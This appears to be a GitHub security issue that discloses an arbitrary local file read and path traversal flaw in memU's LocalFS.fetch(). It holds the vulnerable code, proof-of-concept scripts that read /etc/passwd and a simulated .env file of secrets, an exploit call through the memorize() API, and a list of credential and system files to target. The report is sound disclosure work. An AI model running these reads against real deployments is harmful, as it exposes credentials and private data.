Skip to content

[BUG] [SECURITY] Arbitrary local file read via resource_url in LocalFS.fetch() #385

@aliceQWAS

Description

@aliceQWAS

Description

LocalFS.fetch() in src/memu/blob/local_fs.py reads and returns the contents of any local file when the resource_url parameter resolves to an existing filesystem path. The method checks pathlib.Path(url).exists() and, if true, copies the file to the blob directory and returns its full text content. No directory allowlist, path restriction, or file type validation is applied.

The vulnerable code at src/memu/blob/local_fs.py:57-67:

async def fetch(self, url: str, modality: str) -> tuple[str, str | None]:
    p = pathlib.Path(url)
    if p.exists():
        dst = self.base / p.name
        if str(p.resolve()) != str(dst.resolve()):
            shutil.copyfile(p, dst)                     # copies ANY readable file
        text = None
        if modality in ("conversation", "text", "document"):
            text = dst.read_text(encoding="utf-8")      # returns full file contents
        return str(dst), text

An attacker who can call the memorize() API with a controlled resource_url can read any file accessible to the process, including:

  • /etc/passwd and /etc/shadow (if permissions allow)
  • .env files containing API keys, database credentials, and cloud secrets
  • /proc/self/environ (environment variables, often containing secrets)
  • SSH private keys, TLS certificates, application config files
  • Other users' data on the filesystem

Path traversal sequences (e.g., ../../../etc/passwd) are also accepted because pathlib.Path(url).exists() resolves them before the existence check.

This is reachable through:

  • The memorize() library API
  • The memU-server HTTP endpoint POST /api/v3/memory/memorize
  • The LangGraph save_memory tool integration

Environment

Ubuntu 22.04 (Docker), also reproduced on macOS 15.4

Steps to reproduce

  1. Install memU v1.4.0:

    pip install memu-py==1.4.0
  2. Run the proof of concept:

    import asyncio
    import tempfile
    from memu.blob.local_fs import LocalFS
    
    async def poc():
        fs = LocalFS(tempfile.mkdtemp())
    
        # Read /etc/passwd
        _, text = await fs.fetch("/etc/passwd", "document")
        print(f"Read {len(text)} bytes from /etc/passwd")
        print(text[:200])
    
        # Path traversal also works
        _, text = await fs.fetch("../../../etc/passwd", "document")
        print(f"Path traversal read {len(text)} bytes")
    
    asyncio.run(poc())
  3. Observe that the full contents of /etc/passwd are returned.

  4. Demonstrate reading application secrets:

    import asyncio
    import os
    import tempfile
    from memu.blob.local_fs import LocalFS
    
    async def poc():
        # Create a simulated .env file
        env_path = os.path.join(tempfile.gettempdir(), ".env.poc_test")
        with open(env_path, "w") as f:
            f.write("OPENAI_API_KEY=sk-proj-FAKE_KEY_1234567890\n")
            f.write("DATABASE_URL=postgresql://admin:s3cret@prod-db:5432/memu\n")
            f.write("AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n")
    
        fs = LocalFS(tempfile.mkdtemp())
        _, text = await fs.fetch(env_path, "document")
        print(text)  # All secrets printed
        os.unlink(env_path)
    
    asyncio.run(poc())
  5. Observe that all secrets from the .env file are returned in full.

  6. The same attack works through the public memorize() API:

    from memu import Memu
    
    client = Memu(...)
    await client.memorize(resource_url="/etc/passwd", modality="document")
    # File contents are now stored in memory and retrievable
    results = await client.list_memory_items()

Expected behavior

Local file access in LocalFS.fetch() should be restricted to a configured allowlist of directories (e.g., only the blob storage directory itself). Absolute paths and path traversal sequences that resolve outside the allowed directories should be rejected.

Version

memU v1.4.0 (commit 163d050, memu-py PyPI package)

Severity

Critical

Additional Information

The vulnerability requires no authentication and no user interaction. A single API call can read any file on the filesystem that the process has permissions to access. In typical deployments, this exposes .env files with API keys and database credentials, application configuration, and system files. The file contents are stored in the memory database and can be retrieved by the attacker at any time.

Metadata

Metadata

Assignees

No one assigned

    Labels

    bugSomething isn't working

    Type

    No type
    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions